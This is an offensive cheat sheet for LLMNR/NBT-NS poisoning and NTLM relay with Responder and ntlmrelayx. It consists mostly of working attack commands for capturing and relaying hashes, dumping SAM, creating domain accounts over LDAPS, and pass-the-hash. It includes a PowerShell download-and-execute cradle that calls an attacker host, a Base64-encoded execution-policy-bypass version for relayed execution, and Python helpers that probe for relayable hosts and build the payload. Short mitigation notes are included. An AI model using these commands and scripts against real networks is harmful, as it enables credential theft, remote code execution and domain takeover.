
LLMNR/NBT-NS Poisoning

Responder

Capture mode: leave the SMB (and HTTP) servers enabled in Responder.conf so that Responder answers the poisoned name lookup itself and collects the client's NTLMv2 challenge/response (Net-NTLMv2), then run:

sudo responder -I eth0 -v

What to do with a captured NTLMv2 hash

Crackable: feed it to John or Hashcat. Once the NTLMv2 hash cracks you have username:password, which can be used to gain access directly or to dump the SAM with secretsdump.py.

Uncrackable: relay it instead. A Net-NTLMv2 challenge/response cannot be passed like an NT hash, but it can be relayed live to another host: SMB relay or LDAP relay.

SMB relay

1. Check SMB signing on the targets; relaying only works against hosts where signing is not required.
2. Disable the SMB (and HTTP) servers in Responder.conf so Responder only poisons and does not answer the authentication itself.
3. Run Responder to perform the LLMNR/NBT-NS poisoning.
4. Run ntlmrelayx.py; it relays the NTLMv2 authentication to the target.
5. Mitigation: require SMB signing and disable LLMNR/NBT-NS.

Privilege requirement: for the default SAM dump the relayed user must be a local administrator on the target machine. What ntlmrelayx can do is decided by the relayed identity's rights on the destination host, not by its rights on the machine that sent the authentication.

LDAP relay (relay to the domain controller over LDAP/LDAPS)

High privilege (the relayed user is a domain or enterprise admin): ntlmrelayx creates a new privileged user account.
Low privilege (any domain user): ntlmrelayx creates a machine account, which the default ms-DS-MachineAccountQuota of 10 allows.

Check SMB signing (step 1):

sudo nmap --script=smb2-security-mode 20.20.20.20 -p445
crackmapexec smb 20.20.20.0/24 --gen-relay-list /tmp/targets.txt

nmap reports whether message signing is enabled and whether it is required; --gen-relay-list writes the hosts where signing is not required into /tmp/targets.txt, ready for ntlmrelayx -tf. "Enabled but not required" (the default on Windows workstations and member servers) is still relayable; only "required" (the default on domain controllers) stops the relay.

Relay to SMB (step 4):

sudo /opt/impacket/examples/ntlmrelayx.py -smb2support -t 20.20.20.20
ntlmrelayx -tf unsigin_device.txt -smb2support -c "whoami"

-t relays to one target, -tf to every host listed in a file, -smb2support accepts SMB2/3 clients. Without -c the default action dumps the target's SAM; with -c the command runs on the target, which is also how a reverse shell is launched. The hashes from the SAM dump can then be used for pass-the-hash (PTH).

Mitigation for SMB relay: enable and require SMB signing. Every SMB message is then authenticated (HMAC-SHA256 for SMB 2, AES-CMAC for SMB 3) with a key derived from the session key of the authentication exchange; the relaying attacker never learns that key, so the relayed session's messages fail the signature check.

Relay to LDAPS (LDAP relay, against the domain controller):

sudo python3 /opt/impacket/examples/ntlmrelayx.py -t ldaps://secmeter-dc01.secmeter.local -smb2support --remove-mic
sudo python3 /opt/impacket/examples/ntlmrelayx.py -t ldaps://secmeter-dc01.secmeter.local -smb2support --remove-mic --add-computer

--remove-mic strips the NTLM MIC so that an authentication that started as SMB can be relayed into LDAP(S) (the Drop the MIC bug, CVE-2019-1040; domain controllers patched from June 2019 onward reject it). --add-computer creates a machine account, the low-privilege outcome; without it, a sufficiently privileged relayed user makes ntlmrelayx create a new privileged user.
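The check behind step 1, done by hand. This is an added example and not part of the original cheat sheet: it reproduces what nmap's smb2-security-mode script and crackmapexec --gen-relay-list look at, the SecurityMode field of the server's SMB2 NEGOTIATE response, whose two low bits say whether signing is enabled and whether it is required. The responses classified below are constructed for the demo; probe() performs the live exchange against a real host (it assumes the target accepts an SMB2 NEGOTIATE over direct TCP on port 445) and is not run here.

```python
"""Decide from an SMB2 NEGOTIATE response whether a host is a relay target.

Added example (not from the original cheat sheet). The SecurityMode field of
the NEGOTIATE response is what nmap smb2-security-mode and crackmapexec
--gen-relay-list inspect. fake_negotiate_response() builds a constructed
server reply for the offline demo; probe() is the live version.
"""
import socket
import struct
import uuid

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED = 0x0001   # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002  # SMB2_NEGOTIATE_SIGNING_REQUIRED


def _smb2_header(command: int, flags: int) -> bytes:
    # 64-byte SMB2 header: magic, StructureSize, CreditCharge, Status, Command,
    # Credits, Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, Signature.
    return SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, command, 1, flags,
                                    0, 0, 0, 0, 0) + b"\x00" * 16


def build_negotiate_request(dialects=(0x0202, 0x0210, 0x0300, 0x0302)) -> bytes:
    # NEGOTIATE request body: StructureSize=36, DialectCount, SecurityMode,
    # Reserved, Capabilities, ClientGuid, ClientStartTime, then the dialect list.
    body = struct.pack("<HHHHI16sQ", 36, len(dialects), SIGNING_ENABLED, 0, 0,
                       uuid.uuid4().bytes, 0)
    body += b"".join(struct.pack("<H", d) for d in dialects)
    return _smb2_header(SMB2_NEGOTIATE, 0) + body


def parse_security_mode(response: bytes) -> int:
    """Return the SecurityMode field of an SMB2 NEGOTIATE response."""
    if response[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message (SMB1-only server?)")
    command, = struct.unpack_from("<H", response, 12)
    if command != SMB2_NEGOTIATE:
        raise ValueError(f"unexpected SMB2 command {command:#x}")
    structure_size, security_mode = struct.unpack_from("<HH", response, 64)
    if structure_size != 65:  # fixed StructureSize of a NEGOTIATE response body
        raise ValueError(f"bad NEGOTIATE response StructureSize {structure_size}")
    return security_mode


def classify(security_mode: int) -> str:
    if security_mode & SIGNING_REQUIRED:
        return "signing required: not relayable"
    if security_mode & SIGNING_ENABLED:
        return "signing enabled but not required: relayable"
    return "signing disabled: relayable"


def is_relay_target(response: bytes) -> bool:
    """True when the server does not require signing, i.e. a candidate for -tf."""
    return not (parse_security_mode(response) & SIGNING_REQUIRED)


def probe(host: str, port: int = 445, timeout: float = 3.0) -> str:
    """Live check: send one NEGOTIATE over direct-TCP SMB and classify the reply."""
    request = build_negotiate_request()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        # Direct TCP transport prefix: a zero byte followed by a 24-bit length.
        sock.sendall(struct.pack(">I", len(request)) + request)
        length = struct.unpack(">I", sock.recv(4))[0] & 0x00FFFFFF
        data = b""
        while len(data) < length:
            chunk = sock.recv(length - len(data))
            if not chunk:
                break
            data += chunk
    return classify(parse_security_mode(data))


def fake_negotiate_response(security_mode: int, dialect: int = 0x0302) -> bytes:
    """Constructed server reply for the offline demo (not captured traffic)."""
    # Body: StructureSize=65, SecurityMode, DialectRevision, Reserved, ServerGuid,
    # Capabilities, MaxTransact/Read/WriteSize, SystemTime, ServerStartTime,
    # SecurityBufferOffset, SecurityBufferLength, NegotiateContextOffset.
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0,
                       uuid.uuid4().bytes, 0, 8388608, 8388608, 8388608,
                       0, 0, 128, 0, 0)
    return _smb2_header(SMB2_NEGOTIATE, SMB2_FLAGS_SERVER_TO_REDIR) + body


if __name__ == "__main__":
    for name, mode in (("workstation", SIGNING_ENABLED),
                       ("domain controller", SIGNING_ENABLED | SIGNING_REQUIRED),
                       ("legacy host", 0)):
        print(f"{name}: {classify(parse_security_mode(fake_negotiate_response(mode)))}")
```

The "workstation" case is the one that matters in practice: signing is enabled there by default but not required, so the host still lands in the relay list, while a default domain controller does not.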

After the LDAP relay: with the high-privilege user account you can run DCSync (secretsdump.py against the domain controller) or log in directly; the low-privilege machine account is still a domain account and can be used for enumeration.

To mitigate LDAP relay disable LLMNR/NBT-NS and, on the domain controllers, require LDAP signing and LDAP channel binding.

unsigin_device.txt: the list of hosts (the output of --gen-relay-list) to which the captured NTLMv2 authentication is relayed in order to dump the SAM and obtain NT hashes (the sheet calls these "NTLM v1"; they are the hashes pass-the-hash uses). SMB signing must not be required on these hosts.

ntlmrelayx -tf unsigin_device.txt -smb2support

Without -c the default action dumps the SAM hashes of every target it reaches (-l <dir> chooses the loot directory).

Payload for a command relay, fetched from a web server you control:

IEX (New-Object Net.WebClient).DownloadString('http://192.X.X.X/Sherlock.ps1')
or
IEX (New-Object Net.WebClient).DownloadString('http://192.X.X.X/Sherlock.txt')

Encode the payload as UTF-16LE and then Base64 (the form powershell -enc expects), for example with https://raikia.com/tool-powershell-encoder/, and send it through ntlmrelayx -c.

ntlmrelayx -tf unsigin_device.txt -smb2support -c "powershell.exe -exec bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgBYAC4AWAAuAFgALwBTAGgAZQByAGwAbwBjAGsALgB0AHgAdAAnACkA"

(The Base64 above decodes to IEX (New-Object Net.WebClient).DownloadString('http://192.X.X.X/Sherlock.txt').)

Check where a recovered credential is valid (with a password, or with -H and an NT hash from the SAM dump):

crackmapexec smb 192.168.1.0/24 -u win10_2_user -H 123434412567568768745 -x whoami

The hash shown is a placeholder; a real NT hash is 32 hex characters. -x runs the command on every host where the login succeeds with admin rights, so this also shows where the account is a local administrator.
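Producing and checking the -enc payload locally rather than with the online encoder. This is an added example, not part of the original cheat sheet: powershell -enc takes the script as Base64 over its UTF-16LE bytes, so the functions below encode a command that way, decode an encoded string back so a payload can be reviewed before it is relayed, and assemble the ntlmrelayx argument list. The host 192.X.X.X, the file names and unsigin_device.txt are the placeholders from the sheet.

```python
"""Build and check the encoded command passed to ntlmrelayx -c.

Added example (not from the original cheat sheet). powershell -enc expects
Base64 over the UTF-16LE encoding of the script; this does that locally,
reverses it for review, and assembles the ntlmrelayx argument list.
"""
import base64
import shlex

# The cradle from the cheat sheet; 192.X.X.X is its placeholder for the attacker host.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.X.X.X/Sherlock.txt')"


def encode_powershell(command: str) -> str:
    """Return the -enc form: Base64 over the UTF-16LE bytes of the command."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Inverse of encode_powershell; use it to review a payload before relaying it."""
    raw = base64.b64decode(encoded, validate=True)
    if len(raw) % 2:
        raise ValueError("not UTF-16LE: odd byte count")
    return raw.decode("utf-16-le")


def download_cradle(host: str, path: str) -> str:
    """The download cradle used on the cheat sheet, parameterised by host and file."""
    return f"IEX (New-Object Net.WebClient).DownloadString('http://{host}/{path}')"


def ntlmrelayx_argv(targets_file: str, command: str) -> list[str]:
    """argv that relays to every host in targets_file and runs the encoded command."""
    encoded = encode_powershell(command)
    return ["ntlmrelayx", "-tf", targets_file, "-smb2support",
            "-c", f"powershell.exe -exec bypass -enc {encoded}"]


if __name__ == "__main__":
    argv = ntlmrelayx_argv("unsigin_device.txt",
                           download_cradle("192.X.X.X", "Sherlock.txt"))
    print(shlex.join(argv))
    # Round-trip the last token of the -c argument to confirm what will execute.
    print("decodes to:", decode_powershell(argv[-1].split()[-1]))
```

Round-tripping the encoded string through decode_powershell is worth doing every time: a payload copied from a web encoder with a stray byte or the wrong text encoding fails silently on the target, and a relayed authentication is a one-shot opportunity.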

The relayed command runs as soon as a user on the network tries to reach a host name or share that does not exist: DNS fails, the client falls back to LLMNR/NBT-NS, Responder answers with the attacker's address, the client authenticates to the attacker, and ntlmrelayx forwards that authentication to the target.

Once NT hashes have been dumped from the SAM (the sheet calls them NTLM v1) they can be used for pass-the-hash, for example with evil-winrm (its -H option takes the NT hash). Net-NTLMv2 hashes captured by Responder cannot be passed; they can only be cracked or relayed.
